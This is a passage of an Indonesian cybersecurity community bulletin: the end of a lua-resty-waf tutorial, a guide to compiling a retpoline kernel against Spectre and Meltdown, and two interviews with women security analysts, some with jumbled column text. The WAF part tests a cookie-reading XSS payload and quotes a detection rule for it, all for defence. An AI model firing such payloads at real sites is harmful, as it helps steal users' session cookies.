fastcgi_param SCRIPT_FILENAME $document_root$fastcgi_script_name;
include fastcgi_params;
}
}
Perhatikan pada location / penulis menambahkan include wafstart.conf. dalam hal ini ber-
arti WAF aktif untuk seluruh url pada site test.com.
Kita bisa melakukan aktifasi berdasarkan lingkup peletakan lokasi atau berdasarkan
konfigurasi dari wafinit.conf dari parameter waf:set_option("mode", "ACTIVE").
Jika ACTIVE diganti dengan SIMULATE, maka attack akan tercatat namun tidak terblokir.
# 5 - Konfigurasi rules dan contoh serangan
Mari kita test dengan memasukkan string  
<script>alert(document.cookie)</script>
pada search bar dengan mode ACTIVE.

Gambar 2 - Menjalankan script untuk menampilkan Cookie
Lalu klik search atau tekan enter. Openresty akan memberikan response HTTP 403 For-
bidden. Kemudian lihat pada file /var/log/nginx/waf.log, dimana attack di atas bisa
diperiksa secara lebih detail.
{"timestamp":1521129014,"request_headers":{"host":"test.com","connection":"keep-alive","upgrad
e-insecure-requests":"1","referer":"http:\/\/test.com\/","accept-encoding":"gzip,
deflate","user-agent":"Mozilla\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\/537.36 (KHTML,
like Gecko) Chrome\/64.0.3282.186
Safari\/537.36","cookie":"wordpress_test_cookie=WP+Cookie+check","accept-language":"en-US,en;q
=0.9,id;q=0.8","dnt":"1","accept":"text\/html,application\/xhtml+xml,application\/xml;q=0.9,im
age\/webp,image\/apng,*\/*;q=0.8"}
"id":"b5d85110d941296c6ecf","method":"GET","uri":"\/","client":"192.168.150.1","uri_args":{"s"
:"<script>"},"alerts":[{"msg":"XSS (Cross-Site Scripting)","id":42059,"match":1},{"msg":"XSS
(Cross-Site Scripting) - HTML Tag Handler","id":42069,"match":1},{"msg":"XSS (Cross-Site
Scripting) - IE Filter","id":42083,"match":1},{"logdata":12,"msg":"Request score greater than
score threshold","id":99001,"match":12}]}
Dari log diatas kita bisa simpulkan:
1. Attack di atas memiliki violation score sebesar 12 yang didapat dari gabungan 3 score
violation dari RuleID 42059, 42069 dan 42083.
2. Attack diatas di denied karena score lebih besar dibandingkan option yang telah diset
yaitu: waf:set_option("score_threshold", 8)

Mari kita periksa JSON RuleID 42059 sebagai contoh. Rule ini bisa didapatkan di
/usr/local/openresty/site/lualib/rules/42000_xss.json
! {
"actions" : {
"disrupt" : "SCORE",
"nondisrupt" : [
{
"action" : "setvar",
"data" : {
"col" : "TX",
"inc" : 1,
"key" : "anomaly_score",
"value" : 4
}
}
]
},
"id" : 42059,
"msg" : "XSS (Cross-Site Scripting)",
"operator" : "REFIND",
"opts" : {
"transform" : [
"html_decode",
"compress_whitespace"
]
},
"pattern" : "< ?script\\b",
"vars" : [
{
"parse" : [
"all",
1
],
"type" : "REQUEST_ARGS"
}
]
}
Rule diatas memiliki anomaly score sebesar 4 dan regex "< ?script\\b" perlu diketa-
hui bahwa encoding karakter \ harus dengan \\ (double slash). Sehingga dalam rule diatas
regex sebenarnya adalah
“< ?script\b” yang cocok dengan kata <script> pertama pada injection string yang
dicontohkan.

Pada praktiknya Openresty ini sangat baik bila digabungkan dengan fail2ban untuk keper-
luan dynamic IP blocking dan ELK sebagai log analysis. Sehingga jika ada serangan se-
cara terus menerus maka blocking akan dilakukan mealui iptables (L3) sehingga
menurunkan beban kerja CPU. Hanya saja kekurangannya adalah belum ada mekanisme
native untuk learning mode yang umum didapatkan pada WAF appliances komersial.
Penulis telah menguji stack diatas pada beberapa platform production dan terbukti cukup
handal, benefit terbaik yang penulis rasakan adalah mudahnya integrasi dan kostumisasi
sehingga mempercepat time-to-market dan menjamin homogenitas environment produc-
tion dan QA (Quality Assurance).
Referensi
1. (Re)Introducing lua-resty-waf,
https://www.cryptobells.com/reintroducing-lua-resty-waf/
2. Deploy a Web Application Firewall (NGINX WAF) with NGINX,

https://apility.io/2018/01/20/nginx-waf-openresty/
RENDRA PERDANA
CISSP, Senior Principal Security
Engineer Blibli.com

Mitigasi Spectre & Meltdown dengan
kernel retpoline
ditulis oleh Rendra Perdana
Akhir tahun 2017 lalu dunia keamanan TI dihebohkan dengan ditemukannya vulnerabilities
yang memanfaatkan kelemahan desan dari mikroprosesor yang menyebabkan proses bisa
membaca memory area dari kernel dan data yang dimiliki proses lain.
Google engineer lalu mengusulkan patch yang bernama retpoline untuk mencegah proses
memanfaatkan celah ini. Pada kernel versi 4.9.y, patch untuk merge code retpoline ini su-
dah masuk sejak versi 4.9.77 (tanggal rilis 17 Januari 2018) dan telah di backport oleh ham-
pir sebagian besar distro populer terhadap rilis kernel masing-masing.
Untuk Meltdown dimitigasi dengan satu cara yaitu Page-Table Isolation (PTI). Namun
patch Spectre (proses bisa melihat data proses lain) memiliki variasi implementasi yang
berbeda-beda tergantung kepada vendor CPU (AMD/Intel) dan compiler yang dipakai
ketika kompilasi kernel tersebut.

Mitigasi terbaik memiliki string:
1. “Full generic retpoline” untuk Spectre v2
2. “__user pointer sanitazion” untuk Spectre v1
Penulis memakai versi kernel 4.14.19 dengan compiler GCC-7.3.0 dan informasi menge-
nai kernel yang anda pakai bisa dilihat dengan perintah sebagai berikut
grep -rn . -P /sys/devices/system/cpu/vulnerabilities
spectre_v1:1:Mitigation: __user pointer sanitization

spectre_v2:1:Mitigation: Full generic retpoline
meltdown:1:Mitigation: PTI
Informasi kernel build bisa dilihat dengan perintah
cat /proc/version
Linux version 4.14.19 (compiler@compiler)

(gcc version 7.3.0 (GCC)) #1 SMP Thu Feb 15 23:49:22 WIB 2018
Kesulitan utama dalam meraih grade patching “Full generic retpoline” adalah compiler
yang dipakai harus versi 7.3.0. Mari kita lihat status patch kernel latest dari distro Centos
7 dengan menjalankan perintah sebagai berikut :
grep -rn . -P /sys/devices/system/cpu/vulnerabilities/
spectre_v1:1:Mitigation: Load fences

spectre_v2:1:Vulnerable: Retpoline without IBPB
meltdown:1:Mitigation: PTI
Dan berikut build info dari kernel tersebut:
cat /proc/version
Linux version 3.10.0-693.21.1.el7.x86_64 (builder@kbuilder.dev.centos.org)

(gcc version 4.8.5 20150623 (Red Hat 4.8.5-16) (GCC) ) #1 SMP Wed Mar 7
19:03:37 UTC 2018

Bisa dilihat bahwa centos memakai kernel 4.8.5 dalam mengkompilasi kernel 3.10. Karena
proteksi penuh dari retpoline hanya bisa didapatkan dengan memakai GCC yang memiliki
support terhadap fungsi -mindirect-branch=thunk-extern maka diperlukan insta-
lasi GCC-7.3.0.
Penulis memakai Centos 7 dan berikut tahapan untuk mengkompilasi kernel dengan full
generic retpoline:
1. Instalasi devtoolset-7
2. Instalasi GCC-7.3.0 dengan devtoolset-7

3. Konfigurasi kernel
4. Kompilasi dan install kernel
5. Reboot dan checking
Pada tahapan diatas penulis memakai Centos 7 minimal, dengan direktori tujuan down-
load berada di /opt.
Peringatan!
Penulis menyarankan agar proses ini dilakukan pada virtual machine dan karena GCC
system akan ditimpa maka vm ini tidak disarankan dipakai untuk kompilasi lain. Penulis
menemukan inkompatibilitas terhadap berbagai kompilasi source code open-source
lain ketika memakai GCC-7.3.0, contohnya Redis-4.0.8 dan OpenSSL-1.0.2n
# 1 - Instalasi Devtoolset-7
Devtoolset adalah satu paket yang terdiri dari GNU Compiler Collection (GCC), GNU De-
bugger (GDB), dan software pendukung lainnya. Saat tulisan ini dibuat Devtoolset-7 me-
makai GCC versi 7.2.1

Tahapan instalasinya adalah sebagai berikut
yum install -y centos-release-scl devtoolset-7
Lalu aktifkan pada environment shell anda dengan perintah berikut
scl enable devtoolset-7 bash
Verifikasi dengan perintah:
gcc –version
Jika proses sudah benar maka akan tampil:
gcc (GCC) 7.2.1 20170829 (Red Hat 7.2.1-1)
Jika anda ingin keluar dari environment scl, silahkan exit seperti biasa (CTRL+D) atau per-
intah exit. Tahapan instalasi devtoolset-7 telah selesai.
# 2 - Instalasi GCC-7.3.0 Dengan devtoolset-7

Proses ini sebaiknya dilakukan pada host dengan RAM minimal 8 GB dan disk free space
sebesar 10 GB agar berjalan lancar.
Kompilasi GCC memerlukan beberapa library gcc-infrastructure seperti MPFR, GMP dan
MPC yang bisa diinstall dengan perintah:
yum install -y libmpfr-devel libgmp-devel libmpc-devel
Source code untuk GCC-7 bisa didapatkan dari mirrors yang ada pada halaman:
https://gcc.gnu.org/mirrors.html
Pilihlah mirror yang paling dekat dengan anda, maka masuk kedalam direktori
releases/gcc-7.3.0/ terdapat dua pilihan gcc-7.3.0 yaitu dalam format kompresi xzip
dan gzip.

Kemudian unduh dengan perintah sebagai berkut
wget http://ftp.tsukuba.wide.ad.jp/software/gcc/releases/gcc-7.3.0/gcc-7.3.0.tar.gz
Lalu dekompresi dengan perintah:
tar -xvf gcc-7.3.0.tar.gz
Kemudian masuk ke dalam direktori gcc-7.3.0 dan pastikan sekali lagi bahwa GCC versi
7.2.1 sudah aktif pada environment anda lalu konfigurasi makefile anda dengan perintah:
./configure –disable-multilib –enable-lto –prefix=/usr
Jika tidak ada error maka lanjutkan dengan proses kompilasi melalui perintah:
make -j
atau jika anda melakukan compile pada server dengan core lebih dari, maka jalankan perin-
tah berikut :
make -j$(grep -c ^processor /proc/cpuinfo)
Proses kompilasi diatas memakan waktu kurang lebih 30 menit pada prosesor Intel-i5
6600k (4 core 4 threads) @ 4.4 GHz.
Jika telah selesai silahkan lanjutkan dengan instalasi dengan perintah berikut
make install
Jika telah selesai, keluar dari environment scl dengan (CTRL+D) atau exit. Lalu verifikasi
dengan:
gcc –version

Jika proses berjalan dengan benar maka akan tampil:
gcc (GCC) 7.3.0
Proses kompilasi dan instalasi GCC-7.3.0 telah selesai dan kita bisa lanjut ke tahapan
utama, yaitu konfigurasi dan kompilasi kernel.
# 3 - Konfigurasi Kernel
Proses kompilasi akan memakai RAM sebesar 24-27 GB dan disk free space sebesar
20GB. Untuk memulai, terlebih dahulu install beberapa software yang dibutuhkan untuk
proses kompilasi kernel:
yum groupinstall “Development Tools” -y

yum install -y ncurses-devel bc elfutils-libelf-devel openssl-devel
Kemudian unduh source code kernel melalui website kernel.org, pilih versi stable yang
anda inginkan, anda bisa memilih versi yang tersedia dengan hanya mengubah alamat
download. Pada contoh ini penulis memakai versi 4.14.19 yang diunduh dengan perintah:
wget https://cdn.kernel.org/pub/linux/kernel/v4.x/linux-4.14.19.tar.xz
Kemudian ekstrak file tersebut dengan perintah:

tar -xvf linux-4.14.19.tar.xz
Lalu masuk ke dalam direktori linux-4.14.19 dan ketik perintah berikut untuk masuk keda-
lam menu konfigurasi kernel:
make menuconfig
maka akan tampil menu seperti pada Gambar 1.

Gambar 1 - Tampilan menu Kernel Configuration
Periksa konfigurasi patch meltdown pada path Security Options dan pastikan ada tanda
(*) (lihat Gambar berikut)
Tekan tanda tanya (?) pada menu tersebut untuk menampilkan keterangan sebagai berikut

Untuk Spectre vulnerabilities, patchnya ada pada menu Processor type and features:
Lalu pada menu General Setup berikan (*) pada Enable bpf() system call dan menu di
bawahnya (lihat gambar berikut)
Pastikan juga fitur KASLR diaktifkan, menu tersebut ada pada menu Processor type and
features
Selanjutnya untuk mempercepat dan memperkecil kernel, buanglah konfigurasi yang

kurang perlu, misalnya support untuk CPU non x86 yang ada pada menu Processor type
and features (lihat gambar berikut)
Lalu pilihlah generasi prosesor tempat kernel ini akan dipakai
Lalu berilah nama pada rilis kernel ini pada pilihan Local Version pada menu General
Setup

Setelah konfigurasi diatas selesai maka sekarang waktunya melakukan kompilasi, keluar
dengan memilih menu <save> dengan cara menekan TAB pada keyboard.
# 4 - Kompilasi Kernel
Lalu mulailah kompilasi dengan perintah:
make rpm -j
Jika ada kegagalan pada proses build, backup file .config anda lalu cleanup dengan:
make clean
atau
make distclean
Proses compile kernel ini memakan waktu sekitar 15-30 menit dan kernel akan berada
pada direktori rpmbuild/RPMS/x86/ di home direktori user. Apabila kernel sudah berada
dalam bentuk RPM yang bisa langsung diinstall dengan perintah:
yum install -y kernel-4.14.19CDEF-1.x86_64.rpm

kernel-headers-4.14.19CDEF-1.x86_64.rpm
Update urutan boot anda dengan kernel terbaru dengan perintah:
grub-set-default 0
lalu tulis perubahan grub dengan:
grub2-mkconfig > /etc/grub2.conf (atau grub2-efi.conf jika anda boot dengan EFI)
reboot system anda dan setelah reboot verifikasi versi kernel berjalan dengan:
uname -a
atau
cat /proc/version

yang akan menghasilkan
Linux version 4.14.19CDEF (root@compiler-7.3.0) (gcc version 7.3.0 (GCC))

#1 SMP Sun Fri 16 12:08:24 WIB 2018
# 5 - Checking
lalu cek mitigasi Meltdown dan Spectre dengan:
grep -rn . -P /sys/devices/system/cpu/vulnerabilities
Yang akan menghasilkan:
/sys/devices/system/cpu/vulnerabilities/spectre_v2:1:Mitigation: Full generic retpoline

/sys/devices/system/cpu/vulnerabilities/spectre_v1:1:Mitigation: __user pointer sanitization
/sys/devices/system/cpu/vulnerabilities/meltdown:1:Mitigation: PTI
Anda bisa cek melalui /var/log/dmesg untuk melihat apakah proteksi diatas aktif pada
saat boot.
Selesai sudah proses kompilasi dan instalasi kernel yang telah terproteksi dengan patch
dan memakai compiler yang sesuai. Tahapan berikutnya adalah menguji efektifitas kernel
terhadap security bug dan kehandalan serta kecepatannya terhadap penggunaan sehari-
hari, terutama pada skenario server. Anda bisa melakukan pengujian ini dengan framework
test dari Phoronix yang anda bisa dapatkan pada alamat berikut
https://github.com/phoronix-test-suite/phoronix-test-suite
 
Referensi
1. Retpoline: Binary mitigation for branch-target-injection (aka "Spectre"),
https://lwn.net/Articles/742980/
2. Retpoline Backported To Linux 4.9, Linux 4.14 Kernels,
https://www.phoronix.com/scan.php?page=news_item&px=Linux-4.9-4.14-Retpoline
3. I want life to be boring, says Linus Torvalds as Linux 4.15 debuts,
https://www.theregister.co.uk/2018/01/28/linux_4_15_debuts/

RENDRA PERDANA
CISSP, Senior Principal Security
Engineer Blibli.com

3 “It takes 20 years to build a
TOKOH reputation and few minutes

of cyber-incident to ruin it”
– Stephane Nappo
“Lebih dekat dengan salah satu srikandi
keamanan siber Indonesia - Normis Sisilya“
Foto : Normis Sislya [Koleksi : Redaksi]
Kali ini Tim Redaksi CDEF mendapat ke- yata dia adalah salah satu sosok wanita di
sempatan yang sangat besar untuk Indonesia yang lebih memilih menekuni
bertemu dengan salah satu pegiat kea- bidang keamanan siber, dimana hal ini
manan siber wanita di Indonesia. Dia ada- mungkin salah satu profesi yang jarang
lah seorang analis keamanan di salah satu ditekuni oleh sebagian besar wanita di In-
perusahaan penyedia layanan keamanan donesia. Untuk mengenal lebih dekat ba-
siber terkemuka di Indonesia. Namanya gaimana sosoknya mari kita simak hasil li-
adalah Normis Sisilya, mungkin masih ter- putan redaksi CDEF yang diliput langsung
dengar awam di telinga kita, namun tern- oleh Mas Sida Nala.

Q : Bisa cerita sedikit ngga, Sejak kapan dan bahkan saya sempat hampir memutus-
menggeluti dunia IT Security? Awal mu- kan untuk menyerah, terutama saat itu
lanya gimana sih mbak ? teman-teman tim saya memang berasal
dari background IT Security sehingga saya
A : Saya mulai menggeluti IT Security saat merasa sudah sangat cukup tertinggal dari
mulai bekerja di perusahaan dimana saat mereka dan akan sulit untuk mengejar.
ini saya bekerja. Namun sebenarnya saat
kuliah, saya sempat bergabung selama Q : Kesan anda ketika sudah berkecim-
tiga bulan dengan salah satu komunitas pung di IT Security?
hacking di makassar yang bernama
A : Kesan saya mengenai IT Security saat
Makassar Ethical Hacking (MEH). Saat ber-
gabung dengan komunitas, saya belum ini adalah “sulit tapi seru” terutama ketika
benar-benar meng- berada sebagai pihak
geluti dan mema- Blue Team.

“IT Security itu ‘sulit tapi seru’
hami dunia IT Se-
Q : Ada ngga sih
c u r i t y d i k a r e- terutama ketika kita berada se-
mba orang yang pal-
nakan saat itu bagai pihak Blue Team” ing berjasa menun-
pembelajaran
- Normis Sisilya tun mba Normis
yang saya terima
menggeluti dunia IT
masih dalam ta-
hap dasar mengenai pengenalan berbagai Security ? Jika ada siapa dan mengapa
bahasa pemrograman dan algoritma pe- orang tersebut begitu berjasa buat mba
mograman serta pengenalan terhadap Normis?
sistem operasi Linux.
A : Orang yang paling berjasa menuntun
Q : Bagaimana sih mba, kesan pertama dan mendukung saya adalah senior saya
anda ketika tahu IT Security? Apakah sendiri, yaitu Nurkolish Halim. Dia yang
seperti slogan salah satu produk de- awalnya membawa dan menyakinkan saya
untuk terjun ke dunia IT Security, walau-
odorant, “pertama begitu menggoda, se-
pun saat itu saya benar-benar harus
lanjutnya terserah anda”
merangkak dari bawah untuk belajar IT Se-
A : Kesan pertama ketika tahu IT Security curity.
itu sangat bingung mau memulai darimana

Q : Berapa banyak wanita di kantor atau A : Menurut saya, profesi IT Security itu
yang anda kenal, yang fokus ke dunia IT seru dan menarik terutama sebagai analis.
Security? Alasannya kenapa ? saya juga masih men-
cari, mungkin karena saya menyukai film,
A : Saat ini wanita dikantor atau yang saya komik atau novel yang berbau detektif
kenal fokus ke dunia IT Security ada 3 atau strategi perang, sehingga saya mung-
orang. 2 diantaranya sebagai Security Engi- kin merasa bahwa menjadi analis itu
neer dan 1 sebagai Security Analyst. seperti menjadi detektif atau terkadang
menjadi ahli strategi perang.
Q : Selama berkarir di dunia IT Security,
ada ngga sih mba sebenernya masalah Q : Menurut anda pada awal menapaki
kesetaraan gen- karir, mana sih yang le-
der di bidang bih efektif apakah bela-
“Menjadi pemula bukanlah hal yang me-
IT Security ? jar sendiri, belajar
malukan, yang memalukan adalah ketika
selamanya masih menjadi pemula. s a m a t e m a n , m e n-
A : Saat ini
Jangan takut untuk memulai, tapi takut- gikuti edukasi formal
saya belum
lah ketika kamu tidak berkembang” atau non-formal ?
merasakan hal
itu, bahkan - Normis Sisilya
A : Semua metode bela-
yang saya jar itu efektif bergantung
rasakan malah sebaliknya. Ketika ada dari individu masing-masing. Namun,
yang tau saya bekerja di bidang IT Secu- menurut saya kombinasi dari beberapa me-
rity, saya malah dianggap hebat karena ma- tode belajar tersebut dapat memberikan
sih jarang wanita yang menggeluti IT Secu- dampak yang lebih efektif mulai dari awal
rity. Hal tersebut justru menambah moti- hingga selama menapaki karir.
vasi saya untuk mau belajar lebih dalam
lagi mengenai IT Security. Q: Tantangan anda ketika bekerja di IT
Security sejauh ini seperti apa?
Q : Apa sih kira-kira bedanya kalau ber-
profesi di IT Security dengan profesi A : Tantangannya lebih pada bagaimana
lain? mengendalikan diri saya dalam memperta-
hankan tekad untuk mau terus belajar dan
mengejar ketertinggalan. Karena terka-

dang selama proses tersebut, akan banyak sangat membantu, karena dapat menjadi
hal-hal di luar rencana yang bisa membuat sarana bagi para penggiat IT Security di-
saya hampir memikirkan untuk menyerah luar sana khususnya wanita untuk dapat
dan tidak melanjutkan untuk menggeluti bertemu dan saling berbagi informasi, teru-
dunia IT Security lagi. tama bagi para pemula yang ingin belajar
menggeluti dunia keamanan IT.
Q: Menurut anda skill apa yang paling
penting bagi pemula khususnya wanita Q: Bagaimana pandangan mba Normis,
yang ingin menggeluti dunia keamanan mengapa di dunia keamanan siber ma-
siber ? sih sangat sedikit pegiat keamanan si-
ber wanita ? Adakah yang salah dengan
A : Mungkin dapat dimulai dengan belajar
dunia IT Security itu sendiri ?
mengenai strukturisasi dari sistem operasi,
karena hal itu akan sangat membantu A : Mungkin karena selama ini yang lebih
ketika akan melanjutkan ke tahap yang le- banyak terlihat sukses dalam menggeluti
bih tinggi lagi. Tapi menurut saya dunia IT Security adalah para
yang lebih penting adalah tekad kaum pria dan wanita
yang kuat, karena dalam proses m a- sih dianggap tabu,
belajar tidak akan selamanya atau mungkin juga su-
menyenangkan dan akan ban- dah ada yang ingin
yak hal yang bisa membuat mencoba tapi masih
goyah. bingung dan takut
untuk memulainya
Q: Bagaimana tanggapan dari mana.
anda tentang komuni-
tas Cyber Defense
ini? Dan apa harapan
anda untuk komuni-
tas ini?
A : Menurut saya,
komunitas Cy-
ber Defense

Q: Menurut anda, bagaimana peluang memicu wanita lainnya untuk menunjukkan
karir wanita di IT Security? diri mereka.
A : Menurut saya, peluang itu relatif dan ti- Pemerintah juga bisa meminta data dari be-
dak hanya berlaku bagi kaum wanita saja. berapa perusahaan mengenai para pega-
Mungkin sebaiknya meningkatkan kemam- wai wanitanya yang bekerja di bagian IT
puan softskill dan hardskill yang dimiliki Security, sehingga ketika ada aktifitas
sekarang terlebih dahulu, maka karir juga yang diadakan oleh pemerintah dan ber-
nantinya akan ikut. hubungan dengan IT Security dapat langs-
ung diinfokan kepada mereka.
Q: Menurut anda, apa yang harus dilaku-
kan pemerintah dalam hal ini BSSN un- Q: Ada ngga sih mba tokoh wanita di
tuk membuat wanita di Indonesia ter- dunia IT Security yang mba normis ido-
tarik untuk bekerja di bidang keaman si- lakan ? Kalo ada kenapa sih mba
ber (cybersecurity) ? Normis mengidolakannya ?
A : Kalau menurut saya, mungkin sudah A : Wanita hebat yang saat ini saya tau suk-
banyak yang mulai tertarik dan bahkan su- ses dalam dunia IT Security itu Amanda
dah ada bekerja di bidang IT Security, Rousseau sehingga saya mengidolakan
hanya saja mungkin masih belum banyak beliau, tidak ada alasan khusus karena
yang ter-ekspose oleh pemerintah atau menurut saya semua wanita yang sukses
komunitas-komunitas security. dalam dunia IT Security itu hebat dan
jenius.
Mungkin dapat dimulai dengan meningkat-
kan sosialisasi bahwa wanita juga bisa Q: Terakhir, Quotes anda terkait dengan
bekerja atau menggeluti bidang IT Secu- dunia keamanan siber ?
rity, misalnya dalam bentuk seminar dan
lain-lain. Bisa juga dengan ikut kekinian A : Menjadi pemula bukanlah hal yang me-
membuat bulletin seperti yang dibuat oleh malukan, yang memalukan adalah ketika
komunitas CDEF atau channel youtube selamanya masih menjadi pemula. Jangan
yang mewawancarai para pekerja wanita takut untuk memulai, tapi takutlah ketika
di bidang IT Security sehingga dapat kamu tidak berkembang. Jadikan ketaku-
kan itu motivasi untuk mau lebih berkem-
bang lagi.

 
Normis Sisilya
Security Analyst, PT. Data-
comm Diangraha
   
Log Management (Graylog), Security Infor-
mation and Event Management (SIEM) Ali-
enVault, Incident Response, Vulnerability
Assessment.
70
“Lebih dekat dengan salah satu srikandi
keamanan siber Indonesia - Annisa Fitriana“
“It is hard work and skill that matter,

not gender. Stay secure, stay gor-
geous”
- Annisa Fitriana
Di kesempatan yang berbeda pula Tim Re- menekuni riset di bidang cryptocurrency.
daksi mendapat kehormatan untuk bisa Untuk mengenal lebih dekat bagaimana so-
mewawancarai srikandi keamanan siber di sok mba Icha ini, mari kita simak wawan-
Indonesia lainnya. Kali ini adalah mba caranya dengan Tim redaksi
Annisa atau yang hangat disapa mba Icha.
Dia adalah salah satu wanita yang berani Q : Bisa cerita sedikit ngga, Sejak kapan
memberanikan dirinya untuk terjun me- menggeluti dunia IT Security? Awal mu-
nekuni bidang keamanan siber. Tidak lanya gimana sih mbak ?
tanggung-tanggung dia pun mengambil
A : Saya sudah tertarik dengan dunia IT Se-
jenjang S2 di University of Southampton
curity sejak saya kuliah di semester 6.
dengan bidang minat Cybersecurity dan
Waktu itu iseng ikutan sharing teknik hack-

ing yang diadakan oleh kampus. Materinya Alesannya, gak sekali dua kali saya coba
seru dan mind blowing buat saya yang di bidang lain, tapi ujung-ujung nya kok ya
completely baru tahu dunia IT Security. Se- balik lagi ke bidang ini. Selalu ada hal baru
jak itulah mulai sedikit lebih sering untuk yang selalu bikin saya amazed, it’s like
explore sendiri, coba ikutan lomba dan ”Life is never flat” (slogan Chit*to) terjun ke
mantepin niat untuk ngelanjutin study di dunia ini.
bidang ini. Alhamdulillah dikasih kesem-
patan untuk lanjut ke jurusan Cyber Secu- Q : Kesan anda ketika sudah berkecim-
rity, makin jatuh cinta. pung di IT Security?
Q : Bagaimana sih A : Seru banget. Se-

mba, kesan pertama lalu ada hal baru
(Dalam dunia keamanan siber)
setiap harinya. Gak
anda ketika tahu IT Se- Banyak challenge baru yang
akan ada habisnya
curity? Apakah menarik dan gak akan ada
belajar dibidang ini
seperti slogan salah habisnya jika dibahas, again,
karena jalannya seir-
satu produk deodor- ”Life is never flat”
ing dengan perkem-
ant, “pertama begitu
bangan IT juga. Den-
menggoda, selanjutnya terserah anda”
gan selalu munculnya teknologi baru, re-
A : Gak jatuh cinta pada pandangan per- siko keamanan terhadap teknologi terse-
tama sih juga sih kalau saya terhadap but akan muncul yang baru-baru dan se-
bidang ini. Cintanya dibentuk dulu, dipu- makin beragam, tuntutan dari regulator
puk, dibangun, kayak cinta ke pasangan, juga otomatis akan semakin banyak. Ban-
hihi Awal-awal kenal IT security baru seke- yak challenge baru yang menarik dan gak
dar bikin mind blowing aja, belum sampai akan ada habisnya jika dibahas, again,
jatuh cinta. Tapi begitu mulai sering ex- ”Life is never flat”.
plore, kuliah dibidang itu juga, dapet tugas
Q : Ada ngga sih mba orang yang paling
seputaran itu juga akhirnya mulai berat ka-
berjasa menuntun mba Icha menggeluti
lau harus dilepas. Kayak yang udah nya-
dunia IT Security? Jika ada siapa dan
man aja.
mengapa orang tersebut begitu berjasa
Terkait slogan, kesan saya sejauh ini kayak buat mba Icha?
slogan Rex*na yang “Setia setiap saat”.

A : Banyak banget. Mulai dari mas-mas curity yang saya kenal hanya 1 : 10. Masih
yang sharing ke saya mengenai IT Security lebih mending perbandingan komposisi
pas saya kuliah, Bapak dan Ibu dosen teman-teman saat saya masih kuliah di ju-
yang “nyekokin” saya dengan materi- rusan Cyber Security, which is 1 : 4.
materi IT Security (don’t get me wrong yak,
I like it), temen-temen sewaktu kuliah dan Stereotype ngaruh kali ya. Gak bisa dipung-
di dunia kerja yang terbuka banget kalau kiri kalau bidang ini terkenalnya ya dipe-
diajak sharing mengenai bidang ini, sampe nuhin sama laki-laki. Saya sih gak nge-
saya suka gak tahu waktu. jadiin ini halangan, selama dengan meng-
geluti bidang itu kamu bisa jadi happy, go
Kalau ditanya yang paling, saya akan pilih for it girls, nothing can stop you, not even
mentor saya yang ga ada bosennya ngin- the stereotyping stuff. :D
getin saya untuk terus explore dunia IT Se-
curity ini dan nyemangatin kalau saya lagi Q : Apa sih kira-kira bedanya kalau ber-
gak semangat untuk terus mencoba untuk profesi di IT Security dengan profesi
improve. lain?
Q : Berapa banyak wanita di kantor atau A : Wah, saya bingung ini jawabnya,
yang anda kenal, yang fokus ke dunia IT karena perbedaan yang pertama terlintas
Security? oleh saya sangat subjektif sekali. Saya per-
nah mencoba untuk terlibat dalam projek
A : Sejauh ini untuk yang benar-benar non IT Security dan feel nya gak dapet,
fokus ke dunia IT Security hanya 5 orang, sayanya kurang bisa menikmati, mungkin
kebanyakan adalah teman-teman saya ku- karena sudah kecantol duluan sama IT Se-
liah. curity nya, jadi ya sulit, mau dipaksain
kayak gimana juga susah. Jadi perbedaan
Q : Selama berkarir di dunia IT Security, pertama (subjektif) saya adalah karena
ada ngga sih mba sebenernya masalah saya sudah terlanjur suka, beda dengan
kesetaraan gender di bidang IT Secu- bidang lainnya.
rity?
Sedikit lebih objektif, profesi ini adalah
A : Wah iya, kerasa sekali. Kalau di dunia topik yang relatif baru dan mulai berkem-
kerja minim sekali, perbandingan perem- bang pesat, seiring dengan berkem-
puan dan laki-lakinya yang fokus di IT Se- bangnya technology. Dengan semakin ber-

agamnya technology dan perpindahan ke saya yang belajarnya otodidak yang jadi
era serba digital, cyber-attack menjadi se- dan berprestasi, respect.
makin common dan mengkhawatirkan. Se-
curity dan privacy orang banyak pun bisa Satu hal yang menurut saya penting saat
menjadi taruhannya. Bidang ini unik, menapaki karir adalah dengan adanya men-
karena bertolak belakang dengan kemuda- tor yang tepat. Mentor yang tepat bisa
han yang biasa ditawarkan kepada dan di- membimbing anak-anak “bawang” seperti
saya. Dia bisa berbagi pengalamannya di
dapat oleh pengguna. It is an art, tentang
bidang tersebut sehingga dapat dijadikan
bagaimana menyajikan sesuatu yang
pembelajaran, baik untuk mengikuti jejak
security-oriented tapi tetap bisa membuat
suksesnya dan menghindari kesalahan
pengguna mau dan bahagia menggunakan
yang pernah dia lakukan sehingga kita
teknologinya. The people are just trying
bisa belajar dari kesalahan-kesalahan lain
to save your information.
yang baru yang mungkin kita lakukan nanti-
Q : Menurut anda pada awal menapaki nya (saya percaya kita belajar dari kesala-
karir, mana sih yang lebih efektif han, embrace it).
apakah belajar sendiri, belajar sama te-
Q : Tantangan anda ketika bekerja di IT
man, mengikuti edukasi formal atau
Security sejauh ini seperti apa?
non-formal?
A : Duet maut dengan kenyamanan peng-
A : Kalau ini akan sangat bergantung den-
guna dan pengembang selalu menjadi tan-
gan kebiasaan dan cara belajar per indi-
tangan tersendiri. Terus explore sebagai
vidunya. Kalau saya tipe yang prefer edu-
bentuk upgrade dan update knowledge
kasi formal karena entah mengapa, saya
terutama mengenai sistem keamanan
merasa seolah-olah lebih terpacu untuk be-
teknologi terbaru juga menjadi salah satu
lajar lebih. Kerjasama dan kompetisi den-
tantangannya.
gan teman yang “senasib”, lebih efektif un-
tuk membuat saya lebih semangat lagi be- Q : Menurut anda skill apa yang paling
lajarnya. penting bagi pemula khususnya wanita
yang ingin menggeluti dunia keamanan
Ini bukan berarti jalan saya applicable buat
siber?
semuanya ya, sekali lagi, tergantung den-
gan tipe orangnya. Banyak juga temen

A : Mentally, kemauan dan ketangguhan Q : Bagaimana tanggapan anda tentang
untuk tidak cepat putus asa. Bukanlah hal komunitas Cyber Defense ini? Dan apa
yang mudah untuk bisa terus menjaga se- harapan anda untuk komunitas ini?
mangat agar tetap stabil untuk meng ex-
plore lebih jauh. Terlebih, menurut saya, A : A really good platform to share knowl-
bidang ini tidak mudah, namun tidak akan edge with each other and keep updating
terasa sulit jika sudah terlanjur suka. with the trend of cyber security that is cur-
rently happening. :D
Technically, anything you like. Keamanan
siber sangat luas, bagi yang senang code, Harapan saya, semoga meetup meetup
mulailah meng explore pengembangan dan artikel atau buletin nya bisa diadakan
sistem yang aman, sesuai dengan best lebih sering lagi. Hal ini berguna untuk
